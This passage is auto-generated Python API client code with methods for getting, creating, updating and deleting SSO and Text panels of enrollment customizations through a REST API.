Update a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_put(id, panel_id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelSsoAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_sso_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_panel_id_put_with_http_info(self, id, panel_id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Update a single SSO Panel for a single Enrollment Customization # noqa: E501
Update a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelSsoAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id',
'enrollment_customization_panel_sso_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_panel_id_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_panel_id_put`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_sso_panel_id_put`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_sso_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_sso_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_sso_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_sso_auth` when calling `v1_enrollment_customization_id_sso_panel_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_sso_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_sso_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelSsoAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso/{panel-id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_post(self, id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Create an SSO Panel for a single Enrollment Customization # noqa: E501
Create an SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_post(id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelSsoAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_post_with_http_info(id, enrollment_customization_panel_sso_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_post_with_http_info(self, id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Create an SSO Panel for a single Enrollment Customization # noqa: E501
Create an SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_post_with_http_info(id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelSsoAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'enrollment_customization_panel_sso_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_post`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_sso_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_sso_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_sso_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_sso_auth` when calling `v1_enrollment_customization_id_sso_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_sso_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_sso_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
201: "GetEnrollmentCustomizationPanelSsoAuth",
400: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single Text Panel from an Enrollment Customization # noqa: E501
Delete a single Text panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single Text Panel from an Enrollment Customization # noqa: E501
Delete a single Text panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Text Panel for a single Enrollment Customization # noqa: E501
Get a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelText
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Text Panel for a single Enrollment Customization # noqa: E501
Get a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelText, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelText",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_markdown_get(self, id, panel_id, **kwargs): # noqa: E501
        """Get the markdown output of a single Text Panel for a single Enrollment Customization # noqa: E501
Get the markdown output of a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_markdown_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Markdown
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_markdown_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_markdown_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
        """Get the markdown output of a single Text Panel for a single Enrollment Customization # noqa: E501
Get the markdown output of a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_markdown_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
                              request; this effectively ignores the authentication
                              in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Markdown, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_markdown_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_markdown_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_markdown_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "Markdown",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}/markdown', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_put(self, id, panel_id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Update a single Text Panel for a single Enrollment Customization # noqa: E501
Update a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_put(id, panel_id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelText
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_text, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_put_with_http_info(self, id, panel_id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Update a single Text Panel for a single Enrollment Customization # noqa: E501
Update a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
                              request; this effectively ignores the authentication
                              in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelText, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id',
'enrollment_customization_panel_text'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_put`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_put`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_text' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_text' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_text'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_text` when calling `v1_enrollment_customization_id_text_panel_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_text' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_text']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelText",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_post(self, id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Create a Text Panel for a single Enrollment Customization # noqa: E501
Create a Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_post(id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelText
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_post_with_http_info(id, enrollment_customization_panel_text, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_post_with_http_info(self, id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Create a Text Panel for a single Enrollment Customization # noqa: E501
Create a Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_post_with_http_info(id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
                              request; this effectively ignores the authentication
                              in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
